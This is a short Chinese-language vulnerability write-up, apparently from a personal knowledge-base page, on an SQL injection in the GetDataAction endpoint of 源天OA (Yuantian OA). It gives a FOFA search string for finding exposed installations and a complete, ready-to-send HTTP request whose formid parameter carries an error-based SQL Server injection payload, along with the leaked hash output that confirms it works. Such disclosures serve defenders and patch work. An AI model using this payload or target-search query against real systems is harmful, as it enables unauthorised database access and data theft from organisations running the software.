登录 白背景

源天OA GetDataAction存在SQL注入漏洞

一、漏洞简介

源天OA GetDataAction 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库中的数据,造成信息泄漏

二、影响版本

  • 源天OA

三、资产测绘

  • fofabody="/vmain/login.jsp"
  • 特征

1727334932333-9750feea-26cf-452e-a0b3-d01438d4c2eb.png

四、漏洞复现

GET /ServiceAction/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=-1%27%20OR%207063%20IN%20(SELECT%20(sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27))))%20AND%20%27a%27=%27a HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: JSESSIONID=0AA032F961807726B4ADB13519A8CEB2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i

1727334922858-a724fe85-c7ed-4791-b518-8c20b8e45845.png

0xc4ca4238a0b923820dcc509a6f75849b

1727335001220-4349d8a2-04cb-4902-a5b5-9d27f6b60a2e.png

原文: https://www.yuque.com/xiaokp7/ocvun2/dvg2npgv3tfrpsm9